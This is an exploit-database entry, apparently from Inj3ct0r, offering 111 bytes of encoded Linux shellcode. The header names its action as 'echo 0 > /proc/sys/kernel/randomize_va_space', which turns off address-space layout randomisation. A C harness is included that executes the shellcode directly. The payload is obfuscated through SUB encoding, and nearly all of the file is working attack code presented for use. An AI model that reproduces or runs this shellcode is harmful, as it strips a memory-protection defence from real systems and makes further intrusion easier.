/* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Title : echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode . Name : 111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode . Date : Mon Jul 5 16:58:50 WIT 2010 Author : gunslinger_ Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com) greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !! */ #include char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x57\x80\x44\x0e\xff\x01" "\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff" "\x5f\x30\xbf\x30\xd1\xaf\x0a\x51\x67\x6d\x2e\x72" "\x67\x67\x2e\x2e\x61\x68\x88\xe2\x51\x67\x2c\x62" "\x62\x62\x88\xe0\x51\xea\x06\x50\x52\x88\xe0\xcc" "\x7f\x60\xe7\xf3\xfe\xfe\xfe\x64\x62\x67\x6e\x1f" "\x2f\x1f\x3d\x1f\x2e\x6f\x71\x6e\x62\x2e\x72\x78" "\x72\x2e\x6a\x64\x71\x6d\x64\x6b\x2e\x71\x60\x6d" "\x63\x6e\x6c\x68\x79\x64\x5e\x75\x60\x5e\x72\x6f" "\x60\x62\x64"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }